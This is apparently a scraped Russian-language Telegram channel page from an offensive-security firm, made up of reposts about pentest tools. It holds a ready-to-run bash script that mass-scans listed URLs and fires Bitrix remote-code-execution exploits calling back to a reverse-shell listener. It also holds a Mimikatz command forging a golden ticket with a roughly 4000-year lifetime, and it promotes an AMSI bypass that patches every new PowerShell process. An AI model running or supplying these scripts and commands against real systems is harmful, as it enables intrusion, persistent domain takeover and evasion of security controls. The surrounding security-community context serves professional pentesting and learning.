RESOLUTE ATTACK
Відкрити в Telegram
⚡️RESOLUTE ATTACK - Компания по информационной безопасности YouTube - https://www.youtube.com/@RESOLUTE-ATTACK Chat - @RESOLUTECHAT Web Site - www.resolute-attack.com Обратная связь - @ResoluteAttack_Bot
Показати більше7 299
Підписники
-324 години
-117 днів
-5330 днів
Архів дописів
7 299
👋 У Вас популярный канал — @RESOLUTEATTACK. Вашему каналу теперь доступно оформление внешнего вида, которое выделит его среди других.
Настройки оформления — это эксклюзивный набор опций; Ваш канал должен достичь определённого уровня, чтобы Вы могли применить каждую из них. Предложите подписчикам проголосовать за канал по ссылке: https://t.me/RESOLUTEATTACK?boost. Чем больше у канала голосов, тем выше его уровень. С каждым новым уровнем открывается ещё больше возможностей.
Вы также можете 🎁 разыграть призы; по итогам розыгрыша случайные подписчики получат Telegram Premium в подарок. За каждую разыгранную подписку Ваш канал получит 4 голоса. С недавнего времени проводить розыгрыши стало ещё удобнее — теперь Вы можете выбрать увеличенный срок проведения розыгрыша, добавить собственные призы и автоматически опубликовать список победителей при подведении итогов.
С Новым годом! Желаем всего наилучшего Вам и Вашим подписчикам! 🚗
7 299
Repost from Похек
🔥 quick-trics_auto.sh
Когда-то я выкладывал пост про интересную тулзу для быстрой проверки Bitrix на наличие простых уязвимостей. И я писал, что мол написал скрипт, но с вами им не поделился 🌚
Исправляюсь! Переписал скрипт, теперь он будет бегать по всем урлам построчно и проверять на всё что только можно из этого инструмента, кроме XSS, т.к. модуль фолзит, из-за того, что нагрузка тупо вставляется и если 200, то он пишет что якобы XSS нашёл, но в 99,999% случаев, сайт просто проглотит нагрузку и ничего не случиться.
#!/bin/bash
echo "Lauch netcat for revshells"
printf "Enter IP ($(curl -s 2ip.ru)): "
read $IP
printf "Enter Port: "
read $PORT
for ((i=1; i <= $(wc -l scope.txt | awk '{print $1;}'); i++))
do
quick-tricks spoofing -u $(sed -n "$i p" scope.txt)
quick-tricks redirect -u $(sed -n "$i p" scope.txt)
quick-tricks lfi -u $(sed -n "$i p" scope.txt)
quick-tricks recon -a -u $(sed -n "$i p" scope.txt)
quick-tricks rce vote-agent -u $(sed -n "$i p" scope.txt) --lhost $IP --lport $PORT --agentId 2
quick-tricks rce vote-agent -u $(sed -n "$i p" scope.txt) --lhost $IP --lport $PORT --agentId 4
quick-tricks rce vote-agent -u $(sed -n "$i p" scope.txt) --lhost $IP --lport $PORT --agentId 7
quick-tricks rce html-editor -u $(sed -n "$i p" scope.txt) --lhost $IP --lport $PORT
done
🍷 Написал скрипт так, чтобы вы его просто запустили, а дальше ушли пить чай.
Но скорее всего у вас вообще не окажется quick-tricks, т.к. автор зачем-то удалил/скрыл репозиторий. Поэтому к этому посту я прикреплю бинарь этого инструмента под Linux.
🌚 @poxek7 299
Repost from SecuriXy.kz
CrackMapExec - все...
переходим на NetExec
Вышла обнова v1.1.0 - nxc4u, новые фичи типа Kerberos Constrained Delegation, Execute Tasks on behalf of logged-on Users with Scheduled Tasks, BloodHound now supports computer accounts, FTP Enhancement, Module sorting, WinRM improvements и др
https://www.netexec.wiki
Ставиться проще простого через pipx
apt install pipx git
pipx ensurepath
pipx install git+https://github.com/Pennyw0rth/NetExec
Запускается тоже просто
NetExec nxc nxcdb netexec nxcdbДля простоты восприятия можете добавить ~/.zshrc
alias cme=netexec
alias crackmapexec=netexec7 299
Repost from Bafomёd OSINT
Запись вчерашнего стрима, мини обзор web версии.
Запиь в облаке - https://cloud.mail.ru/public/Fr7y/CkhWFerFE
7 299
Repost from 1N73LL1G3NC3
SharpKiller
Lifetime AMSI bypass by
@ZeroMemoryEx ported to .NET Framework 4.8
Live scan for new powershell processes every 0.5 seconds -> Automatically patches new powershell instances7 299
⚡️ Компания RESOLUTE ATTACK поддерживает разработку open source инструментов для пентеста
RA помогает в разработке документации на русском, английском языке и в популяризации инструмента для Lateral Movement - GOST v3
Одной из особенностей нашего инструмента является возможность создания множества цепочек перенаправления, что является Must Have в тестировании AD, и больших корпоративных сетей
Мы также создали бота для обратной связи, где вы можете напрямую обратиться к разработчикам данного инструмента и помочь в улучшении его - @gogostbot
Документация: https://gost.run/en/
GitHub: https://github.com/go-gost/gost
7 299
Уверенно можем сказать, что это потенциальный аналог мальтего в будущем, работы для этого предстоит ещё очень много
7 299
Repost from Bafomёd OSINT
https://t.me/osint_san_framework?livestream=044837696e686ad90d
Стрим по новому инструменту через 40 минут. Обязательно приходим
7 299
RAS-X | SI VIS PACEM, PARA BELLUM | RESOLUTE ACTIVE SECURITY - X
⚡️ Компания RESOLUTE ATTACK представляет уникальное для России предложение и новый продукт RAS X - RESOLUTE ACTIVE SECURITY X
https://youtu.be/EOfbLgUeb9E?feature=shared
7 299
Repost from Schwarz_Osint
Добрый день участник, ты нам нужен!
У нас есть два публичных отдела, отдел расследований и отдел контента. Именно там происходит работа над сообществом и нам нужны люди!
— Отдел Расследований (NPID) занимается расследованиями публичных некоммерческих кейсов, разработкой методологий поиска информации по зарубежью и чуть-чуть черной магией. Если у тебя уже есть опыт в OSINT и ты хочешь развить свои навыки работая в команде, то тебе к нам! Примером его работы является недавний кейс по Ronaldo 18K;
— Отдел Контента (NPCD) занимается формированием новостей, следит за новостями из мира Разведки и всячески формулирует наше видение OSINT-индустрии. Если у тебя есть опыт копирайтинга, редактуры, или тебе интересно разобраться в индустрии, то тебе сюда! Примером его работы является наш ежемесячный #vestnik
Для того что б попасть в нашу команду, пиши: @northen_palmyra
7 299
Немногие знают о существовании фичи которую использовать нельзя, она позволяет создавать бесконечный golden ticket. С грустью вспоминаю те времена, когда можно было создать golden ticket без существующей учётки в домене
Я думаю все знают, что по стандарту золотой билет создаётся на 10 лет. И все понимают, что существуют настраиваемые политики домена. Но командой
/endin: можно корректировать время жизни тикета в минутах
Remi Solberg из offsec выяснил (бородой по круче чем у берсерка), путём не сложной игрой битами, что максимальное время жизни golden ticket - 2147483647 минут. Это примерно 4000 лет. Но детект не заставит вас долго ждать. Или у вас это просто не получится сделать, так как все админы находятся в Protected Users. Использовать не рекомендую
Mimikatz
kerberos::golden /user:user /domain:domain /sid:domainsid /krbtgt:hash /endin:2147483647 /ticket:название
Tadn3wb